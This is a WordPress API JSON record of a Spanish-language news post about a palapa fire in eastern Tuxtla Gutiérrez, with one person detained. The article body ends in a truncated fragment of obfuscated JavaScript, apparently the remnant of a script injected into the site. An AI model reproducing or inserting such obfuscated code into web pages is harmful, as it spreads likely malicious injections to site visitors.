{"id":10145,"date":"2023-05-23T03:35:44","date_gmt":"2023-05-23T03:35:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10145"},"modified":"2023-05-23T03:35:45","modified_gmt":"2023-05-23T03:35:45","slug":"se-incendia-palapa-en-la-zona-oriente-de-tuxtla-hay-un-detenido","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10145","title":{"rendered":"Se incendia palapa en la zona Oriente de Tuxtla, hay un detenido"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684812872911-1024x576.jpg\" alt=\"\" class=\"wp-image-10146\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684812872911-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684812872911-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684812872911-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1684812872911.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 21 de mayo del 2023. &#8211; En los primeros minutos de este lunes se registr\u00f3 el incendio de una palapa en la zona Oriente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho se registr\u00f3 cerca de las 12:10, en el establecimiento localizado en el Bulevar Fidel Velazquez y Calzada de Las Etnias.<\/p>\n\n\n\n<p>Al estar quem\u00e1ndose, inmediatamente se trasladaron los elementos de Bomberos para atacar las llamas.<\/p>\n\n\n\n<p>Cerca de 20 minutos con equipo especializado atacaron el fuego para sofocarlo que \u00fanicamente afect\u00f3 la bodega del establecimiento.<\/p>\n\n\n\n<p>Afortunadamente no hubo personas lesionadas y en el lugar fue detenida una persona por un presunto conflicto laboral.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 21 de mayo del 2023. &#8211; En los primeros minutos de este lunes se registr\u00f3 el incendio de una palapa en la zona Oriente de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales este hecho se registr\u00f3 cerca de las 12:10, en el establecimiento localizado en el Bulevar Fidel Velazquez y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10146,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10145","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10145"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10145\/revisions"}],"predecessor-version":[{"id":10147,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10145\/revisions\/10147"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10146"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10145"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10145"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}